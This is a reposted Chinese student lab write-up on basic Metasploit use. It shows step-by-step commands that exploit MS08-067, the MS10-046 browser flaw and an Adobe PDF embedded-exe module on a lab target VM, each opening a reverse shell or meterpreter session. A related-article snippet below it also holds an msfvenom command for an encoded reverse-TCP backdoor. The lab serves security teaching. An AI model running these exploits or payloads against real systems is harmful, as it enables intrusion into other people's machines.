20155233 《网络对抗》 Exp5 MSF基础应用

最新推荐文章于 2024-09-14 00:06:44 发布
最新推荐文章于 2024-09-14 00:06:44 发布
阅读量287 收藏
点赞数
文章标签: 网络 shell
原文链接:http://www.cnblogs.com/l20155233/p/8905885.html
版权

主动攻击:ms08_067漏洞攻击

  1. 启用msf终端msfconsole然后使用search命令搜索该漏洞对应的模块:search ms08_067
    1071472-20180422100349622-1924192743.jpg

  2. 选择输入use exploit/windows/smb/ms08_067_netapi,之后查看信息:show payloads,选择攻击载荷set payload generic/shell_reverse_tcp

  3. 查看配置渗透攻击所需的配置项show options,查看渗透攻击模块所能成功渗透攻击的目标平台show targets
    1071472-20180422100358916-317205505.jpg
    1071472-20180422100412934-934486456.jpg

  4. 根据目标情况配置渗透攻击的各个选项
    1071472-20180422161857864-2057859280.png

  5. 回连成功,进行相关命令测试
    1071472-20180422162100039-1656020685.png

对浏览器攻击:ms10_046漏洞攻击

  1. 基本步骤同上,先利用指令search ms10_046找到可以攻击的模块
    1071472-20180422163139025-992447235.jpg

  2. 我们这里选择第一个,输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    1071472-20180422164723547-513098352.jpg

  3. 输入show payloads选择攻击载荷,我们选择generic/shell_reverse_tcp,输入命令set payload generic/shell_reverse_tcp使用
    1071472-20180422164831984-1064500435.jpg

  4. 根据目标情况配置渗透攻击的各个选项,输入命令show options查看配置设置并进行修改
    1071472-20180422165526721-158317469.jpg

  5. 输入exploit执行
    1071472-20180422165855214-341094208.jpg

  6. 可以看到生成了所需的URL,在靶机浏览器访问后,kal得到相应但没有出现预期效果
    1071472-20180422170448647-1908156699.jpg

  7. 对配置进行修改,选用set payload windows/meterpreter/reverse_tcp,设置后查看结果,输入sessions查看到一个ID号为1的会话
    1071472-20180422172746260-623248167.jpg

  8. 使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息
    1071472-20180422173103086-1285867508.jpg

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

  1. 输入search adobe查询和adobe漏洞有关的模块,我选择exploit/windows/fileformat/adobe_pdf_embedded_exe
    1071472-20180422175016681-417149406.jpg

  2. 选择攻击载荷payload,这里我选windows/meterpreter/reverse_tcp
    1071472-20180422175314023-11606195.jpg

  3. 输入命令set payload windows/meterpreter/reverse_tcp使用攻击载荷
    1071472-20180422175621394-178033178.jpg

  4. 根据目标情况配置渗透攻击的各个选项
    1071472-20180422175714695-1006341450.jpg

  5. 执行,查看结果
    1071472-20180422175755967-237023066.jpg

  6. 可以看到在相应目的生成了evil.pdf,我们来将它发送到靶机

  7. 输入相关命令打开监听
    1071472-20180422182323597-476718988.jpg

  8. 回连成功,输入命令查看系统信息
    1071472-20180422182526521-1368316016.jpg

辅助模块的应用:scanner/http/options,功能Display available HTTP options for each system

  1. 输入命令show auxiliary查看辅助模块,并挑选使用scanner/http/options
  2. 输入命令use scanner/http/options,输入info查看信息
    1071472-20180424110214812-868015290.jpg

  3. 设置参数
    1071472-20180424112752719-1451449659.jpg

  4. exploit执行
    1071472-20180424110137525-1420861682.jpg

基础问题回答

  1. 用自己的话解释什么是exploit,payload,encode.
    exploit是漏洞利用,我们执行exploit后,我们所运送的程序或代码就开始去寻找漏洞,并控制它为我们服务。
    payload是有效载荷,在我们执行exploit后,谁来运送程序或代码呢?这个payload就是关键的一个环节。
    encode是编码,对我们的程序或代码进行伪装,使其避免被查收。

实验体会

通过本次实验,使我加深了对平时计算机下补丁的意识,本次实验是让我们知道如何根据特定漏洞去攻击特定系统,一个漏洞只能攻击没有装相应补丁的系统,可想而知漏洞的重要性,如果漏洞被发现,而没有装补丁,我们的系统就赤裸裸的暴露在黑客手下,而我们却毫不自知,所以我们要及时安装补丁,要养成网络安全意识,尽可能避免病毒、木马的入侵,提高专业知识,掌握相应技能。

转载于:https://www.cnblogs.com/l20155233/p/8905885.html

dayang1122334
关注
PDF恶意文件攻击技术研究
不忘初心,护天下安全!
06-01 306
利用漏洞Adobe Reader TTF 字体 SING 表栈溢出漏洞 漏洞编号:CVE-2010-2883实现无文件攻击
Kali学习 | 漏洞利用:4.10 PDF文件攻击
qq_43233085的博客
01-12 1850
Kali学习 | 漏洞利用:4.10 PDF文件攻击 PDF介绍操作步骤 PDF介绍 PDF是一种文件格式,该文件的使用比较广泛,并且容易传输。 通常在工作中,用户都是从工作程序中打开了一个合法的PDF文档。 当打开该文档时,该用户的主机就有可能被攻击。 Metasploit提供了一个渗透攻击模块,可以来创建一个攻击载荷,通过传递该攻击载荷对目标系统进行渗透攻击。 操作步骤 (1)启动MSFCON...
Exp5 MSF基础应用 20164309 欧阳彧骁
a569847381的博客
04-12 246
1.实验内容 1.0Armitage初体验 在kali端输入armitage启动armitage 发现开启失败,更根据提示先输入/etc/init.d/postgresql start,打开postgresql服务再进入armitage 更改端口为学号4309,其他选项默认不变 进入界面发现没有可以攻击的主机 选择上方菜单栏hosts-nma...
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 383
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
网络对抗 Exp5 MSF基础应用 20154311 王卓然
weixin_30700977的博客
04-18 153
Exp5 MSF基础应用 1. 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms10_018、ms12_004; 1.3 一个针对客户端的攻击,如Adobe、ms10_087; 1.4 成功应用辅助模块(smb版本...
2018-2019 20165237网络对抗 Exp5 MSF基础应用
weixin_30354675的博客
04-21 128
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08-067; (1分) ms17_010_psexec(√) 不唯一 一个针对浏览器的攻击,如ms11-050;(1分) ms14_064_ole_lode_execution(√)不...
20155337《网络对抗Exp5 MSF基础应用
05-03 199
20155337《网络对抗Exp5 MSF基础应用 实践目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 一、基础问题回答 (1)用自己的话解释什么是ex...
20155333 《网络对抗Exp5 MSF基础应用
aodieshao2474的博客
05-02 194
20155333 《网络对抗Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法; payload:攻击武器,真正具有攻击性的代码; encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行。 实践 一个主动攻击实践,如ms...
网络对抗Exp5 MSF基础应用
weixin_30668887的博客
04-27 140
20155336《网络对抗Exp5 MSF基础应用 一、基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻击的代码传送到靶机中。 payload:攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。 encode:编码,实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。 ...
20204323太晓梅 网络对抗exp6 MSF应用基础
m0_57567318的博客
05-04 151
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 706
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 558
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 951
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
centos下nvme over rdma 环境配置
一名运维开发工程师的日常记录
09-13 313
RDMA(全称:Remote Direct Memory Access)是一种远程直接内存访问技术,通过在硬件中实现传输层协议,将内存/消息原语接口暴露至用户空间,通过绕过CPU和内核网络协议栈来实现高吞吐和低延迟的网络。RoCE(RDMA over Converged Ethernet)是一种允许通过以太网使用远程直接内存访问(RDMA)的网络协议。关于什么是NVMe over Fabrics,什么是NVMe over RDMA,本文就不做介绍了,网上资料一大堆。
如何在DPDK中实现协议解析?
Do my best!
09-10 648
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
​数据链路层——流量控制&可靠传输机制 ​
qq_25467441的博客
09-09 747
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
【计网】从零开始使用UDP进行socket编程 --- 客户端与服务端的通信实现
最新发布
叫我龙翔的博客
09-14 643
本文讲解了UDP协议下的服务端与客户端通信过程!!!
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值